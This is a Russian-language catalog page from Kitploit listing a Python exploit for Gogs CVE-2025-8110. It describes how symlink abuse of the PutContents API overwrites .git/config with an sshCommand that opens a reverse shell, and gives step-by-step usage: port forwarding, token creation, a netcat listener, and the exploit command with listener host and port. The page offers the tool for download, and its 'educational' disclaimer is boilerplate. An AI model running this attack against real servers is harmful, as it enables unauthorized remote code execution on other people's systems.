Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8110-Gogs-RCE-Exploit — Gogs CVE-2025-8110 RCE Exploit | Kitploit
Инструменты/GitHubGitHub/adityainnovates/cve-2025-8110-gogs-rce-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubadityainnovates/cve-2025-8110-gogs-rce-exploit

CVE-2025-8110-Gogs-RCE-Exploit

Gogs CVE-2025-8110 RCE Exploit

Репозиторий
135 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Gogs CVE-2025-8110 RCE Exploit

Автоматизированный Python-эксплойт для CVE-2025-8110 в Gogs. Эта уязвимость позволяет выполнять удаленный код (RCE) путем злоупотребления API PutContents, который не проверяет, является ли путь к файлу символической ссылкой. Перезаписывая внутренний файл .git/config через символическую ссылку, мы можем внедрить вредоносную команду sshCommand, чтобы запустить обратную оболочку.

🛠️ Prerequisites

Убедитесь, что у вас установлен Python 3 и необходимые зависимости:

root@kitploit:~
pip install requests rich beautifulsoup4

Также необходимо, чтобы git был установлен и доступен в вашем $PATH для этапов клонирования репозитория и создания коммитов.

⚙️ Setup & Configuration

1. Доступ к веб-интерфейсу Gogs

Gogs может быть привязан к 127.0.0.1:3001. Используйте перенаправление портов для локального доступа к веб-интерфейсу:

root@kitploit:~
ssh -L 3001:127.0.0.1:3001 user@target-ip

2. Создание учетной записи

После перенаправления перейдите по адресу http://localhost:3001:

  • Создайте новую учетную запись.
  • Запишите ваше Имя пользователя и Пароль для скрипта.

3. Генерация API-токена

Скрипт использует API Gogs для доставки полезной нагрузки:

  1. Войдите в веб-интерфейс.
  2. Перейдите в Настройки -> Приложения.
  3. В разделе Управление персональными токенами доступа создайте новый токен.
  4. Скопируйте токен сразу.

🚀 Выполнение

1. Запустите слушатель Netcat

Запустите ваш слушатель перед выполнением скрипта, так как оболочка активируется сразу после обработки обновления API.

root@kitploit:~
nc -lvnp 5555

2. Запустите эксплойт

Передайте ваши учетные данные и токен в качестве аргументов:

root@kitploit:~
python3 exploit.py -u http://localhost:3001 -un <ВАШ_ПОЛЬЗОВАТЕЛЬ> -pw <ВАШ_ПАРОЛЬ> -t <ВАШ_ТОКЕН> -lh <ВАШ_IP> -lp 5555

Аргументы

ФлагОписание
-uБазовый URL экземпляра Gogs (например, http://localhost:3001).
-unИмя пользователя созданной учетной записи.
-pwПароль созданной учетной записи.
-tAPI-токен, сгенерированный в Настройках.
-lhIP-адрес вашего слушателя (LHOST).
-lpПорт вашего слушателя (LPORT).

Примечание: Если скрипт зависает или возвращает Read timed out после "Overwriting .git/config", проверьте ваш слушатель. Обычно это означает, что обратная оболочка успешно подключилась и удерживает соединение.


Автор: TYehan

Отказ от ответственности: Этот инструмент предназначен только для образовательных целей и авторизованного аудита безопасности. Используйте ответственно.

Скачать инструмент